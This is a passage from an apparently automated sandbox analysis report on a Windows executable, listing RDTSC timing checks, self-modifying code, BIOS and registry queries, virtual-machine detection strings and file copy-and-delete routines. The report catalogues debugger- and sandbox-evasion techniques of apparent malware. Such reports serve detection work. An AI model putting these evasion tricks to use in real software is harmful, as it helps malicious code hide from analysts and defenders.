                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF8E6 second address: 9DF8EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EAABB second address: 9EAAC5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBD38D4D51Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA614 second address: 9EA628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD3853A98Eh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA784 second address: 9EA788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA788 second address: 9EA78C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F085B second address: 9F0861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F047C second address: 9F0482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD989 second address: 9FD98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD98F second address: 9FD995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05478 second address: A054A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 jo 00007FBD38D4D516h 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop esi 0x00000011 pop eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FBD38D4D527h 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A054A6 second address: A054AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05626 second address: A05632 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBD38D4D516h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05632 second address: A0563C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBD3853A996h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0563C second address: A05654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD38D4D51Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FBD38D4D516h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05654 second address: A05658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05A66 second address: A05A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05C22 second address: A05C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05C26 second address: A05C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05C33 second address: A05C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05D58 second address: A05D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05D60 second address: A05D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05D69 second address: A05D89 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBD38D4D516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FBD38D4D52Ah 0x00000010 jmp 00007FBD38D4D51Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0683F second address: A06843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A09D53 second address: A09D5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A09D5F second address: A09D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0BF5D second address: A0BF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0BAA0 second address: A0BAB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3853A995h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0BAB9 second address: A0BABE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0BC22 second address: A0BC2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0BC2A second address: A0BC36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FBD38D4D516h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D541 second address: A1D545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D545 second address: A1D566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FBD38D4D521h 0x0000000c push eax 0x0000000d pop eax 0x0000000e jo 00007FBD38D4D516h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D385 second address: A1D3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBD3853A986h 0x0000000a jnl 00007FBD3853A986h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FBD3853A994h 0x00000017 push esi 0x00000018 pop esi 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c jmp 00007FBD3853A996h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FBD3853A999h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D3E4 second address: A1D3FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38D4D51Ch 0x00000007 jbe 00007FBD38D4D516h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D3FA second address: A1D400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15E97 second address: A15E9E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AA5C second address: A2AA62 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AA62 second address: A2AA6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A71F second address: A2A723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A723 second address: A2A729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A729 second address: A2A73D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jns 00007FBD3853A986h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A73D second address: A2A74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jc 00007FBD38D4D516h 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A74A second address: A2A75D instructions: 0x00000000 rdtsc 0x00000002 js 00007FBD3853A98Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jnl 00007FBD3853A986h 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A520 second address: A3A528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A528 second address: A3A52E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A39375 second address: A39379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A39379 second address: A3937F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3937F second address: A3939E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FBD38D4D526h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3969C second address: A396A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A39DAD second address: A39DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A39F58 second address: A39F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3853A991h 0x00000009 pop eax 0x0000000a jmp 00007FBD3853A996h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A39F84 second address: A39F9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38D4D521h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A0D7 second address: A3A10D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FBD3853A999h 0x0000000c jmp 00007FBD3853A98Bh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop ecx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A10D second address: A3A111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A111 second address: A3A115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A115 second address: A3A144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBD38D4D516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007FBD38D4D529h 0x00000012 jmp 00007FBD38D4D521h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jng 00007FBD38D4D516h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A144 second address: A3A148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A2A3 second address: A3A2A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BDDF second address: A3BDE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BDE4 second address: A3BDF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD38D4D51Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BDF8 second address: A3BDFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BDFC second address: A3BE00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E6F3 second address: A3E6F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E6F9 second address: A3E6FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EBFF second address: A3EC89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3853A98Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b jmp 00007FBD3853A98Ch 0x00000010 pop eax 0x00000011 nop 0x00000012 mov edx, dword ptr [ebp+122D2A39h] 0x00000018 push dword ptr [ebp+122D1AA4h] 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007FBD3853A988h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000017h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 call 00007FBD3853A989h 0x0000003d jmp 00007FBD3853A98Eh 0x00000042 push eax 0x00000043 push edi 0x00000044 jmp 00007FBD3853A98Ch 0x00000049 pop edi 0x0000004a mov eax, dword ptr [esp+04h] 0x0000004e jp 00007FBD3853A98Eh 0x00000054 jc 00007FBD3853A988h 0x0000005a push eax 0x0000005b pop eax 0x0000005c mov eax, dword ptr [eax] 0x0000005e push esi 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 pop eax 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FF10 second address: A3FF42 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBD38D4D516h 0x00000008 jmp 00007FBD38D4D521h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBD38D4D525h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FF42 second address: A3FF4C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBD3853A986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FF4C second address: A3FF5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 jg 00007FBD38D4D51Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41827 second address: A4182C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4392E second address: A43932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A43932 second address: A4393C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4393C second address: A43940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50804E4 second address: 50804EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50804EA second address: 50804EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50804EE second address: 50804F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50804F2 second address: 5080511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBD38D4D524h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080511 second address: 5080523 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD3853A98Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080523 second address: 5080527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080527 second address: 5080560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FBD3853A997h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBD3853A995h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080560 second address: 5080566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080601 second address: 5080626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, FAh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBD3853A996h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080626 second address: 5080635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38D4D51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95F56D second address: 95F571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7ADC42 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 976761 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9E3CA3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-37509
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_004D40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_004CE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004C1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_004D47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004CF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004D4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004D3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_004CDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_004CBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_004CEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004CDF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C1160 GetSystemInfo,ExitProcess,0_2_004C1160
                Source: file.exe, file.exe, 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwaref7 K
                Source: file.exe, 00000000.00000002.1731343295.00000000012D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                Source: file.exe, 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1731343295.000000000130B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1731343295.0000000001305000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
